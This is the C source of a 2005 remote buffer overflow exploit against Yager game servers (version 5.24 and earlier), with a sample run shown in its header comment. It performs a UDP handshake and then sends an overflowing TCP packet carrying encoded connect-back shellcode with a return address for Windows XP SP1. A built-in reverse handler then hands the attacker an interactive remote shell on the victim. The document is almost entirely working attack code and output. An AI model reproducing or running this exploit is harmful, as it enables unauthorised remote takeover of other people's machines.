/* * * Yager <= 5.24 Remote Buffer Overflow Exploit * * cybertronic[at]gmx[dot]net * 04/25/2005 * * send all the money to Luigi Auriemma * __ __ _ * _______ __/ /_ ___ _____/ /__________ ____ (_)____ * / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/ * / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ * \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/ * /____/ * * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net * --[ select target * --[ 0 [0xdeadc0de] crash server * --[ 1 [0x300686bd] binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER] * >> 1 * --[ sending handshake [UDP]...done! * --[ reading server response [UDP]...done! * --[ server port: 1089 * --[ connecting to 192.168.2.100:1089 [TCP]...done! * --[ exploiting WinXP Pro SP1 GER * --[ ret: 0x300686bd [ jmp esp in binkw32.dll ] * --[ exploiting packet overflow... * --[ sending packet...done! * --[ starting reverse handler [port: 1337]...done! * --[ incomming connection from: 192.168.2.100 * --[ b0x pwned - h4ve phun * Microsoft Windows XP [Version 5.1.2600] * (C) Copyright 1985-2001 Microsoft Corp. * * C:\Yager> * */ #include #include #include #include #define PORT_UDP 34855 #define RED "\E[31m\E[1m" #define GREEN "\E[32m\E[1m" #define YELLOW "\E[33m\E[1m" #define BLUE "\E[34m\E[1m" #define NORMAL "\E[m" /* * * prototypes * */ int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, unsigned long ret ); int isip ( char *ip ); int send_handshake ( int s, struct sockaddr_in remote_addr ); int shell ( int s, char* tip, unsigned short cbport ); void header (); void start_reverse_handler ( char* argv3 ); /********************* * Windows Shellcode * *********************/ /* * Type : connect back shellcode * Length: 316 bytes * CBIP : reverseshell[111] ( ^ 0x99999999 ) * CBPort: reverseshell[118] ( ^ 0x9999 ) * */ unsigned char reverseshell[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9" "\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3" "\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE" "\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99" "\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF" "\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6" "\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF" "\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD" "\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD" "\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD" "\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66" "\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66" "\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB" "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3" "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3" "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75" "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2" "\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0"; /* * * structures * */ struct targets { int num; unsigned long ret; char name[64]; } target[]= { { 0, 0xdeadc0de, "crash server" }, { 1, 0x300686bd, "binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]" } //push esp in binkw32.dll }; /* * * functions * */ int exploit ( int s, unsigned long xoredcbip, unsigned short xoredcbport, unsigned long ret ) { int r; char buffer_pack[592]; printf ( "--[ exploiting WinXP Pro SP1 GER\n" ); printf ( "--[ ret: 0x%08x [ jmp esp in binkw32.dll ]\n", ret ); memcpy ( &reverseshell[111], &xoredcbip, 4); memcpy ( &reverseshell[118], &xoredcbport, 2); r = ~time ( NULL ) & 0xffff; printf ( "--[ exploiting packet overflow...\n" ); bzero ( &buffer_pack, sizeof ( buffer_pack ) ); memset ( buffer_pack, 0x41, 268 ); strncat ( buffer_pack, ( unsigned char* ) &ret, 4 ); strncat ( buffer_pack, "\x41\x41\x41\x41", 4 ); //4 bytes padding memcpy ( buffer_pack + 276, reverseshell, sizeof ( reverseshell ) - 1 ); buffer_pack[0] = 0x00; buffer_pack[1] = 0x00; buffer_pack[2] = 0x00; buffer_pack[3] = 0x00; buffer_pack[4] = 0x46; //sizeof ( buffer_pack ) - 0xa; 582d / 246h buffer_pack[5] = 0x02; //sizeof ( buffer_pack ) - 0xa; 582d / 246h buffer_pack[6] = ( r & 0x00ff ); buffer_pack[7] = ( ( r & 0xff00 ) >> 8 ); buffer_pack[8] = 0x00; buffer_pack[9] = 0x00; printf ( "--[ sending packet..." ); if ( write ( s, buffer_pack, sizeof ( buffer_pack ) ) <= 0 ) { printf ( "failed!\n" ); return ( 1 ); } printf ( "done!\n" ); return ( 0 ); } int isip ( char *ip ) { int a, b, c, d; if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) ) return ( 0 ); if ( a < 1 ) return ( 0 ); if ( a > 255 ) return 0; if ( b < 0 ) return 0; if ( b > 255 ) return 0; if ( c < 0 ) return 0; if ( c > 255 ) return 0; if ( d < 0 ) return 0; if ( d > 255 ) return 0; return 1; } int send_handshake ( int s, struct sockaddr_in remote_addr ) { char* p; char crap[23]; char in[2048]; unsigned short port; bzero ( &crap, sizeof ( crap ) ); crap[0] = 0x59; crap[1] = 0x5f; crap[2] = 0x4e; crap[3] = 0x45; crap[4] = 0x54; crap[5] = 0x5f; crap[6] = 0x59; crap[7] = 0x41; crap[8] = 0x47; crap[9] = 0x45; crap[10] = 0x52; crap[11] = 0x5f; crap[12] = 0x43; crap[13] = 0x4c; crap[14] = 0x49; crap[15] = 0x45; crap[16] = 0x4e; crap[17] = 0x54; crap[18] = 0x00; *( u_short* ) ( crap + 19 ) = ~time ( NULL ); crap[21] = 0x00; crap[22] = 0x00; printf ( "--[ sending handshake [UDP]..." ); if ( sendto ( s, crap, sizeof ( crap ), 0, ( struct sockaddr* ) &remote_addr, sizeof ( remote_addr ) ) < 0 ) { printf ( "failed!\n" ); return ( 1 ); } printf ( "done!\n" ); printf ( "--[ reading server response [UDP]..." ); bzero ( &in, sizeof ( in ) ); if ( recvfrom ( s, in, sizeof ( in ) -1, 0, NULL, NULL ) < 0 ) { printf ( "failed!\n" ); return ( 1 ); } printf ( "done!\n" ); p = in + 19; port = ntohs ( *( u_short * ) p ); printf ( "--[ server port: %d\n", port ); return ( port ); } int shell ( int s, char* tip, unsigned short cbport ) { int n; char buffer[2048]; fd_set fd_read; printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" ); FD_ZERO ( &fd_read ); FD_SET ( s, &fd_read ); FD_SET ( 0, &fd_read ); while ( 1 ) { FD_SET ( s, &fd_read ); FD_SET ( 0, &fd_read ); if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 ) break; if ( FD_ISSET ( s, &fd_read ) ) { if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 ) { printf ( "bye bye...\n" ); return; } if ( write ( 1, buffer, n ) < 0 ) { printf ( "bye bye...\n" ); return; } } if ( FD_ISSET ( 0, &fd_read ) ) { if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 ) { printf ( "bye bye...\n" ); return; } if ( send ( s, buffer, n, 0 ) < 0 ) { printf ( "bye bye...\n" ); return; } } usleep(10); } } void header () { printf ( " __ __ _ \n" ); printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" ); printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" ); printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" ); printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" ); printf ( " /____/ \n\n" ); printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" ); } void start_reverse_handler ( char* argv3 ) { int s1, s2; unsigned short cbport; struct sockaddr_in cliaddr, servaddr; socklen_t clilen = sizeof ( cliaddr ); sscanf ( argv3, "%u", &cbport ); bzero ( &servaddr, sizeof ( servaddr ) ); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl ( INADDR_ANY ); servaddr.sin_port = htons ( cbport ); printf ( "--[ starting reverse handler [port: %u]...", cbport ); if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 ) { printf ( "socket failed!\n" ); exit ( 1 ); } bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) ); if ( listen ( s1, 1 ) == -1 ) { printf ( "listen failed!\n" ); exit ( 1 ); } printf ( "done!\n" ); if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 ) { printf ( "accept failed!\n" ); exit ( 1 ); } close ( s1 ); printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) ); shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport ); close ( s2 ); } int main ( int argc, char* argv[] ) { int s1, s2, targ, i; unsigned long xoredcbip; unsigned short cbport, xoredcbport, port; struct sockaddr_in remote_addr; struct hostent* host_addr; if ( argc != 4 ) { printf ( "Usage: %s \n", argv[0] ); exit ( 1 ); } system ( "clear" ); header (); if ( !isip ( argv[1] ) ) { printf ( "Invalid Target IP!\n" ); exit ( 1 ); } if ( !isip ( argv[2] ) ) { printf ( "Invalid connect back IP!\n" ); exit ( 1 ); } printf("--[ select target\n"); for ( i = 0; i < 2; i++ ) printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name ); printf ( " >> " ); scanf ( "%d", &targ ); if ( targ != 0 ) if ( targ != 1 ) { printf ( "--[ invalid target!\n" ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT_UDP ); if ( ( s1 = socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } if ( ( port = send_handshake ( s1, remote_addr ) ) == 1 ) { printf ( "handshake FAILED!\n" ); exit ( 1 ); } close ( s1 ); if ( ( s2 = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } printf ( "--[ connecting to %s:%u [TCP]...", argv[1], port ); remote_addr.sin_port = htons ( port ); if ( connect ( s2, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( "done!\n" ); xoredcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; if ( exploit ( s2, xoredcbip, xoredcbport, target[targ].ret ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } close ( s2 ); start_reverse_handler ( argv[3] ); }